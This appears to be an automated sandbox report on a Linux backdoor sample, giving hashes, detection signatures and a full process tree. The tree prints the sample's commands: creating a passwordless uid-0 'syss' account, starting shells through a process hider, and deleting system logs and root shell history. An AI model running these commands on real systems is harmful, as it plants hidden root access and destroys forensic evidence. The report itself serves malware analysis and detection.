f3820982b2a60d3b0890dba5567da078ba20b7332f5d44c1759401bca452a2c9

Analysis

max time kernel
5s
max time network
128s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20231222-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20231222-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
22/12/2023, 17:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fb54895b9172cf81bd2f64640e01a37d
Size

6KB
MD5

fb54895b9172cf81bd2f64640e01a37d
SHA1

cf3b6bf6dcaf2316705372b456ea097ba399560b
SHA256

f3820982b2a60d3b0890dba5567da078ba20b7332f5d44c1759401bca452a2c9
SHA512

e1a739b38a912468f4a1469b55aca7f35d9c5b03f76169c114c10029a184134c272db758cf8961c4257c2988ee87ec36b90d52115ea82cb309182774095e9ced
SSDEEP

96:O75sFwotSsUKbLBrnVJTiyVSR+MpuM20725Re0Rvsc:o5sFwTKbLBrPpVSfky725Re0Rv

Score

8^/10

evasion

Malware Config

Signatures

Modifies password files for system users/ groups 10 IoCs

Modifies files storing password hashes of existing users/ groups, likely to grant additional privileges.

description	ioc	Process
File opened for modification	/etc/gshadow	useradd
File opened for modification	/etc/shadow	useradd
File opened for modification	/etc/shadow	passwd
File opened for modification	/etc/gshadow	useradd
File opened for modification	/etc/shadow	useradd
File opened for modification	/etc/shadow	passwd
File opened for modification	/etc/passwd	useradd
File opened for modification	/etc/group	useradd
File opened for modification	/etc/passwd	useradd
File opened for modification	/etc/group	useradd

Deletes system logs 1 TTPs 1 IoCs

Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

evasion

Indicator Removal

T1070

description	ioc	Process
File deleted	/var/log/syslog	rm

Adds a user to the system 2 IoCs

pid	Process
1644	useradd
1659	useradd

Deletes log files 1 TTPs 17 IoCs

Deletes log files on the system.

Indicator Removal

T1070

description	ioc	Process
File deleted	/var/log/faillog	rm
File deleted	/var/log/wtmp	rm
File deleted	/var/log/smail/logfile	rm
File deleted	/var/log/tallylog	rm
File deleted	/var/log/sendfile/*	rm
File deleted	/var/log/alternatives.log	rm
File deleted	/var/log/auth.log	rm
File deleted	/var/log/dpkg.log	rm
File deleted	/var/log/lastlog	rm
File deleted	/var/log/Xorg.0.log	rm
File truncated	/var/log/smail/logfile	fb54895b9172cf81bd2f64640e01a37d
File deleted	/var/log/btmp	rm
File deleted	/var/log/fontconfig.log	rm
File deleted	/var/log/gpu-manager.log	rm
File deleted	/var/log/kern.log	rm
File deleted	/var/log/ubuntu-advantage.log	rm
File deleted	/var/log/Xorg.0.log.old	rm

Enumerates running processes
Discovers information about currently running processes on the system

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/filesystems	tar
File opened for reading	/proc/filesystems	sshd
File opened for reading	/proc/1148/stat	killall
File opened for reading	/proc/1181/cmdline	killall
File opened for reading	/proc/170/stat	killall
File opened for reading	/proc/1182/stat	killall
File opened for reading	/proc/1518/stat	killall
File opened for reading	/proc/1292/cmdline	killall
File opened for reading	/proc/1594/stat	killall
File opened for reading	/proc/348/stat	killall
File opened for reading	/proc/1183/stat	killall
File opened for reading	/proc/26/stat	killall
File opened for reading	/proc/1158/stat	killall
File opened for reading	/proc/703/stat	killall
File opened for reading	/proc/1178/stat	killall
File opened for reading	/proc/98/stat	killall
File opened for reading	/proc/657/cmdline	killall
File opened for reading	/proc/895/stat	killall
File opened for reading	/proc/794/stat	killall
File opened for reading	/proc/14/stat	killall
File opened for reading	/proc/1352/stat	killall
File opened for reading	/proc/560/stat	killall
File opened for reading	/proc/994/stat	killall
File opened for reading	/proc/1132/cmdline	killall
File opened for reading	/proc/1060/stat	killall
File opened for reading	/proc/1356/stat	killall
File opened for reading	/proc/1435/stat	killall
File opened for reading	/proc/1128/stat	killall
File opened for reading	/proc/25/stat	killall
File opened for reading	/proc/163/stat	killall
File opened for reading	/proc/1249/cmdline	killall
File opened for reading	/proc/1269/stat	killall
File opened for reading	/proc/1317/cmdline	killall
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/3/stat	killall
File opened for reading	/proc/489/stat	killall
File opened for reading	/proc/577/stat	killall
File opened for reading	/proc/666/stat	killall
File opened for reading	/proc/766/stat	killall
File opened for reading	/proc/1079/stat	killall
File opened for reading	/proc/1172/stat	killall
File opened for reading	/proc/89/stat	killall
File opened for reading	/proc/1/sched	systemctl
File opened for reading	/proc/80/stat	killall
File opened for reading	/proc/798/cmdline	killall
File opened for reading	/proc/1249/stat	killall
File opened for reading	/proc/3/stat	killall
File opened for reading	/proc/sys/kernel/ngroups_max	useradd
File opened for reading	/proc/filesystems	useradd
File opened for reading	/proc/1288/stat	killall
File opened for reading	/proc/13/stat	killall
File opened for reading	/proc/1092/stat	killall
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/1064/stat	killall
File opened for reading	/proc/480/stat	killall
File opened for reading	/proc/591/stat	killall
File opened for reading	/proc/561/stat	killall
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/576/stat	killall
File opened for reading	/proc/592/stat	killall
File opened for reading	/proc/1181/cmdline	killall
File opened for reading	/proc/1645/stat	killall
File opened for reading	/proc/166/stat	killall
File opened for reading	/proc/self/loginuid	passwd

/tmp/fb54895b9172cf81bd2f64640e01a37d
/tmp/fb54895b9172cf81bd2f64640e01a37d
1⤵
- Deletes log files
PID:1606
- /bin/hostname
  hostname -i
  2⤵
  PID:1607
- /usr/bin/whoami
  whoami
  2⤵
  PID:1609
- /bin/tar
  tar -zxvf vf.tgz
  2⤵
  - Reads runtime system information
  PID:1610
- /etc/init.d/inetd
  /etc/init.d/inetd start
  2⤵
  PID:1612
- /etc/init.d/ssh
  /etc/init.d/ssh start
  2⤵
  PID:1613
- - /bin/run-parts
    run-parts --lsbsysinit --list /lib/lsb/init-functions.d
    3⤵
    PID:1617
- - /bin/systemctl
    systemctl -p LoadState --value show ssh.service
    3⤵
    PID:1618
- - /bin/readlink
    readlink -f /etc/init.d/ssh
    3⤵
    PID:1619
- - /bin/systemctl
    systemctl -p CanReload --value show ssh.service
    3⤵
    PID:1620
- - /bin/systemctl
    systemctl is-system-running
    3⤵
    - Reads runtime system information
    PID:1621
- - /bin/systemctl
    /bin/systemctl --no-pager start ssh.service
    3⤵
    - Reads runtime system information
    PID:1622
- /bin/hostname
  hostname -f
  2⤵
  PID:1623
- /bin/chmod
  chmod 755 dor
  2⤵
  PID:1624
- /tmp/dor
  ./dor
  2⤵
  PID:1625
- /bin/chmod
  chmod 755 neo1
  2⤵
  PID:1626
- /bin/chmod
  chmod 755 neo2
  2⤵
  PID:1627
- /bin/chmod
  chmod 755 md5
  2⤵
  PID:1628
- /bin/chmod
  chmod 755 she
  2⤵
  PID:1629
- /bin/chmod
  chmod 755 hell
  2⤵
  PID:1630
- /tmp/xh
  ./xh -s /bin/sh -d -p neo1.pid ./neo1 a -u 0:0
  2⤵
  PID:1631
- /tmp/xh
  ./xh -s /bin/sh -d -p hell.pid ./bash
  2⤵
  PID:1632
- /tmp/xh
  ./xh -s /bin/sh -d -p hell2.pid ./she a -u 0:0
  2⤵
  PID:1633
- /tmp/.,
  "./.,"
  2⤵
  PID:1634
- /tmp/xh
  ./xh -s /bin/sh -d -p neo2.pid ./neo2 a -u 0:0
  2⤵
  PID:1635
- /tmp/xh
  ./xh -s /usr/sbin/httpd -d -p hell.pid ./bash
  2⤵
  PID:1636
- /usr/bin/touch
  touch /var/log/alternatives.log /var/log/apt /var/log/audit /var/log/auth.log /var/log/btmp /var/log/cups /var/log/dist-upgrade /var/log/dpkg.log /var/log/faillog /var/log/fontconfig.log /var/log/gdm3 /var/log/gpu-manager.log /var/log/hp /var/log/installer /var/log/journal /var/log/kern.log /var/log/lastlog /var/log/speech-dispatcher /var/log/syslog /var/log/tallylog /var/log/ubuntu-advantage.log /var/log/unattended-upgrades /var/log/wtmp /var/log/Xorg.0.log /var/log/Xorg.0.log.old
  2⤵
  PID:1637
- /bin/chmod
  chmod 744 /var/log/alternatives.log /var/log/apt /var/log/audit /var/log/auth.log /var/log/btmp /var/log/cups /var/log/dist-upgrade /var/log/dpkg.log /var/log/faillog /var/log/fontconfig.log /var/log/gdm3 /var/log/gpu-manager.log /var/log/hp /var/log/installer /var/log/journal /var/log/kern.log /var/log/lastlog /var/log/speech-dispatcher /var/log/syslog /var/log/tallylog /var/log/ubuntu-advantage.log /var/log/unattended-upgrades /var/log/wtmp /var/log/Xorg.0.log /var/log/Xorg.0.log.old
  2⤵
  PID:1638
- /usr/bin/killall
  killall -HUP inetd
  2⤵
  - Reads runtime system information
  PID:1639
- /bin/mv
  mv hell.pid /dev/tty1O
  2⤵
  - Reads runtime system information
  PID:1640
- /bin/mv
  mv hell2.pid /dev/ttys
  2⤵
  PID:1641
- /bin/mv
  mv neo2.pid /dev/.c
  2⤵
  PID:1642
- /bin/mv
  mv neo3.pid /dev/.d
  2⤵
  PID:1643
- /usr/sbin/useradd
  useradd nobodye
  2⤵
  - Modifies password files for system users/ groups
  - Adds a user to the system
  - Reads runtime system information
  PID:1644
- - /usr/sbin/nscd
    nscd -i passwd
    3⤵
    PID:1649
- - /usr/sbin/nscd
    nscd -i group
    3⤵
    PID:1650
- - /sbin/pam_tally2
    pam_tally2 --user nobodye --reset --quiet
    3⤵
    PID:1651
- - /usr/sbin/nscd
    nscd -i passwd
    3⤵
    PID:1652
- - /usr/sbin/nscd
    nscd -i group
    3⤵
    PID:1653
- /usr/bin/passwd
  passwd -d nobodye
  2⤵
  - Modifies password files for system users/ groups
  - Reads runtime system information
  PID:1654
- - /usr/sbin/nscd
    nscd -i passwd
    3⤵
    PID:1655
- - /usr/sbin/nscd
    nscd -i group
    3⤵
    PID:1656
- - /usr/sbin/nscd
    nscd -i passwd
    3⤵
    PID:1657
- - /usr/sbin/nscd
    nscd -i group
    3⤵
    PID:1658
- /usr/sbin/useradd
  useradd -u 0 -o -g 0 -s /bin/bash syss
  2⤵
  - Modifies password files for system users/ groups
  - Adds a user to the system
  - Reads runtime system information
  PID:1659
- - /usr/sbin/nscd
    nscd -i passwd
    3⤵
    PID:1660
- - /usr/sbin/nscd
    nscd -i group
    3⤵
    PID:1661
- - /sbin/pam_tally2
    pam_tally2 --user syss --reset --quiet
    3⤵
    PID:1662
- - /usr/sbin/nscd
    nscd -i passwd
    3⤵
    PID:1663
- - /usr/sbin/nscd
    nscd -i group
    3⤵
    PID:1664
- /usr/bin/passwd
  passwd -d syss
  2⤵
  - Modifies password files for system users/ groups
  PID:1665
- - /usr/sbin/nscd
    nscd -i passwd
    3⤵
    PID:1666
- - /usr/sbin/nscd
    nscd -i group
    3⤵
    PID:1667
- - /usr/sbin/nscd
    nscd -i passwd
    3⤵
    PID:1668
- - /usr/sbin/nscd
    nscd -i group
    3⤵
    PID:1669
- /usr/bin/killall
  killall -HUP inetd
  2⤵
  - Reads runtime system information
  PID:1670
- /usr/bin/killall
  killall -HUP /usr/sbin/inetd
  2⤵
  PID:1671
- /usr/bin/killall
  killall -HUP inetd
  2⤵
  - Reads runtime system information
  PID:1672
- /usr/bin/killall
  killall -HUP /usr/sbin/inetd
  2⤵
  PID:1673
- /bin/rm
  rm vf.tgz
  2⤵
  PID:1674
- /bin/rm
  rm -rf .bash
  2⤵
  PID:1675
- /bin/rm
  rm neo.sh
  2⤵
  PID:1676
- /bin/rm
  rm d00r.tgz
  2⤵
  PID:1677
- /bin/rm
  rm neo.sh
  2⤵
  PID:1678
- /bin/rm
  rm -rf .bash
  2⤵
  PID:1679
- /usr/bin/clear
  clear
  2⤵
  PID:1680
- /bin/sleep
  sleep 2
  2⤵
  PID:1681
- /bin/rm
  rm "/var/adm/*"
  2⤵
  PID:1688
- /bin/rm
  rm /var/log/alternatives.log /var/log/apt /var/log/audit /var/log/auth.log /var/log/btmp /var/log/cups /var/log/dist-upgrade /var/log/dpkg.log /var/log/faillog /var/log/fontconfig.log /var/log/gdm3 /var/log/gpu-manager.log /var/log/hp /var/log/installer /var/log/journal /var/log/kern.log /var/log/lastlog /var/log/speech-dispatcher /var/log/syslog /var/log/tallylog /var/log/ubuntu-advantage.log /var/log/unattended-upgrades /var/log/wtmp /var/log/Xorg.0.log /var/log/Xorg.0.log.old
  2⤵
  - Deletes system logs
  - Deletes log files
  PID:1689
- /usr/bin/touch
  touch /var/log/apt /var/log/audit /var/log/cups /var/log/dist-upgrade /var/log/gdm3 /var/log/hp /var/log/installer /var/log/journal /var/log/speech-dispatcher /var/log/unattended-upgrades
  2⤵
  PID:1690
- /bin/chmod
  chmod 744 /var/log/apt /var/log/audit /var/log/cups /var/log/dist-upgrade /var/log/gdm3 /var/log/hp /var/log/installer /var/log/journal /var/log/speech-dispatcher /var/log/unattended-upgrades
  2⤵
  PID:1691
- /bin/chmod
  chmod 744 "/usr/local/psionic/portsentry/*"
  2⤵
  PID:1692
- /bin/rm
  rm /var/log/smail/logfile
  2⤵
  - Deletes log files
  PID:1693
- /bin/rm
  rm "/var/log/sendfile/*"
  2⤵
  - Deletes log files
  PID:1694
- /bin/rm
  rm /root/.bash_history
  2⤵
  PID:1695
- /usr/bin/touch
  touch /root/.bash_history
  2⤵
  PID:1696
- /bin/rm
  rm /var/log/apt /var/log/audit /var/log/cups /var/log/dist-upgrade /var/log/gdm3 /var/log/hp /var/log/installer /var/log/journal /var/log/speech-dispatcher /var/log/unattended-upgrades
  2⤵
  PID:1697
- /usr/bin/touch
  touch /var/log/apt /var/log/audit /var/log/cups /var/log/dist-upgrade /var/log/gdm3 /var/log/hp /var/log/installer /var/log/journal /var/log/speech-dispatcher /var/log/unattended-upgrades
  2⤵
  PID:1698
- /bin/uname
  uname -a
  2⤵
  PID:1699

/usr/sbin/sshd
/usr/sbin/sshd "-?"
1⤵
- Reads runtime system information
PID:1615

/bin/grep
grep -q OpenSSH
1⤵
PID:1616

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/group+

Filesize
932B

MD5
692781ad8874268ff61a1ec743367a0b

SHA1
9a6521377a663fd711eee22995a707ae416ed8ff

SHA256
533bb657e86423d4d694e4e2f5fdabf3c69157379c9b61a73f425f884a76417c

SHA512
7b47a860313a5b6d9ee4abefb90c4db32615d4d37d8c17dad141d83f94ad73c75ddc4e7ed058cc5243cdf723d10cb496e044f7647c8c55cfa63fa6606017833c

Download Submit
/etc/gshadow+

Filesize
774B

MD5
bcb61d7c88e2195e894f79de1cba1eb1

SHA1
0a8090a97442ac6c73d22d956e85fde1d8366612

SHA256
f849ea35fbcecd54eb3d0737221ceac32a4f386e4b80296b80926a1200fe827f

SHA512
02dc8974c43fed68b5250d68f30947c976ba816ca1046e8cc90bcb32d7844efebe4751f86f0e2f8e09e22b26d7f67667e4f17aac04585c51d48877d38d9a8300

Download Submit
/etc/inetd.conf

Filesize
108B

MD5
805c078b04c62ba6b08774c971e4a46c

SHA1
1d4dacbf6f2fdb4ef5c77d62af887256e8b48a5b

SHA256
2cd7611f8eeb432c0e69ce2dda4b6cb5fda705b90973222aed98f0237575626f

SHA512
b9a73e5eb39c55893318fbd3bf3ec9dc67bf6db939dbdea1b8991f9d360173245a9c25be0f26cee337979e9be72129ba1552cc35698dc3bb73666b16c87e54eb

Download Submit
/etc/inetd.conf

Filesize
150B

MD5
7111b6d0b9c4bf5ef9f0827827cea242

SHA1
26a1ec7e94266e2c2cdf86d672dae803fe60b9c4

SHA256
29ff469110cd8590b3e8dea7a4569d2f28328f5b425ae3afb622fe16fe18c286

SHA512
56407f04729933d0a1214b86d3364e471016b29685cc7426d23dee972f9f6f9c542764df0a77b83c3c1593e02b0e3161fcd1a099a39a39d0b7387eeda474b9e6

Download Submit
/etc/inetd.conf

Filesize
192B

MD5
811958786c52f5eb86a72cc72649d4f6

SHA1
f6af90cf725982d5bca2882c7a1bce4610308852

SHA256
08e406955ece3dfe4af00abba6dcf27307b4e391b3449dd2e8eae031b08ab605

SHA512
31a967025d3fbcc30ccf46aea9c8a2f2fe5fb5161c5d81ba611357d96f8a44400757bef242bd80b74414951d42bb81617fbd2a9658aa6edb5e8133d35b416887

Download Submit
/etc/inetd.conf

Filesize
247B

MD5
7257090296a47080e6d68e334a8eb52a

SHA1
0ee39f8b4958178122c33e78a49c72b8964e38ca

SHA256
b11b8494283b5ca746f89dcbb5741cc3176875afa67dbed789a92e47da8048d3

SHA512
e4096ec05f7b234fd3bf4682b0947877cf4db73bc9931de67227efe4b8a2444a65b7cdda5c324fac3403d34e92970d114f8b08ff0617fa7ba335c54dbd68107e

Download Submit
/etc/passwd+

Filesize
2KB

MD5
0bfc67dfe28fc0aeb3eeca12c780b1b6

SHA1
14f5ecf096b18a8644afd059f2cc0a15d9beffdb

SHA256
76c748666fa974ebd05769affadedef4747eaa6fd0719754fe6daf60297ad5bf

SHA512
4e6730385efc77d7a7d22d30fc617b7cbf0b46bc20aab566c0985761e8f5e52650029e4c2844856ddbbb2a45b83997461c07fbf1d9ecd96751d677e620963b58

Download Submit
/etc/passwd+

Filesize
2KB

MD5
49741c552be8b60bc0818dfb5725778c

SHA1
3b442048d1d9d80ff70356970ea22bcf777a2417

SHA256
0a0648f9e1176eeee0780c6dee2ca3dc62a8ef71ba11394be428fc35c25d3bea

SHA512
f99fdfe8ce55c46a43db9adde61d4a2f82f84ff61f9cdb787e38874c20ee892600f6637ec1007169b90061f95a42861adc195571cbd56bb5dac39e51aefaaf86

Download Submit
/etc/shadow+

Filesize
1KB

MD5
8df657e0251967bce0a9ff2388f0372f

SHA1
11c139f747e18aeb74ffae689b88e1c59e6a0df6

SHA256
de6dbf3fddd6f3aec451c921a837002f6d2f8c08fc7c7d6c8223bfb309b1ea76

SHA512
2726ca3e6086eb90bc87663412cc57bf13a131f50dde6ebf90e28f09617880acd7e38b6e3f220b3efd597e27fe7e523b13fb534ec186c58691b7bb52912cc45a

Download Submit
/etc/shadow+

Filesize
1KB

MD5
ad20ba205caaba4f83af217350f8505f

SHA1
14b2218d5eb160ea1fe9773ea8f92a7975539971

SHA256
7d46eebfab09dc3c4b1a585bb9cda5d0a2b8acd4a155d2c8eb4f3f2f0d567fd7

SHA512
3615aba9bdd385e08d0f143b7bf6516c01a84da4c159208f92318ff9071a402107fb8e2118808f7fd66a68ce2d115dcc50b9e28937b1cac5a0ffa04388edf286

Download Submit
/etc/shadow+

Filesize
1KB

MD5
64e6f6443b94d3cc1663b205b56f9dc4

SHA1
d947b3e7a9b61d9e474c621dc1692978b1b8095b

SHA256
51e3c3153e9ae0287c82f89f9430e16ffb286b2ed0038443f38cd7b12739c597

SHA512
8c17d20aa07e1e6c9f8b4db582d77a36a9ee338759d6c2c51c05ce4da94b9b5eefa0c64c894938986542d01c8e7d652aac5e629c97588bd4acf8be046aaa5968

Download Submit
/etc/shadow+

Filesize
1KB

MD5
c0278c63ffeffdeb303cff881c4ccddb

SHA1
4dbc262783d0784e5b7525fc4b1c091134b76c14

SHA256
416aab4db0c3f486a163f6b819b8b49b141c5dfd3b147ad0e00fa04291ffd10c

SHA512
dbf35355537a57aa9cec6c96892828f10c84bdef7837e72e6d1a40e439ca0591637ca345de695752eff8a18bdaf4aad4b7fd23742bf1bef50e108637547d4a54

Download Submit
/etc/subuid+

Filesize
57B

MD5
fef84338f1a1a03416174da1b5dd3cf3

SHA1
181c0e1ddd5c37430cca417b0181d76fb75bfb53

SHA256
51da847b6a2634ca8d7869d3c6add818351654f9dbc1b5e4730a91ca5cfb2c93

SHA512
cbd9d2ade356e7793468c5f530d4107d7d321fe82cd4fe80d00404d5a77c371e31f1fbfd494362276644aa1bdec45569f26d0c587ddabbe9901fe23ef5356acb

Download Submit
/etc/subuid+

Filesize
39B

MD5
2bf187abcd598f6789ea835ee49e3d15

SHA1
50dde212e4a7a253f685c88df63e5ffe1a455d86

SHA256
43341e0286b16ee4347f725a1c02b3e156c2d80f1b47a2de2d7c7ba4a04869d7

SHA512
77e886b13365c0e4be375553ce4bd3297ea0893f39413025ecb3decdb5c8be7e64d9fa05f2f5b2b73a6ba0d162675ae6680e5ae451fd133609476aa763ea566e

Download Submit
/root/.bash_history

Filesize
1B

MD5
68b329da9893e34099c7d8ad5cb9c940

SHA1
adc83b19e793491b1c6ea0fd8b46cd9f32e592fc

SHA256
01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

SHA512
be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads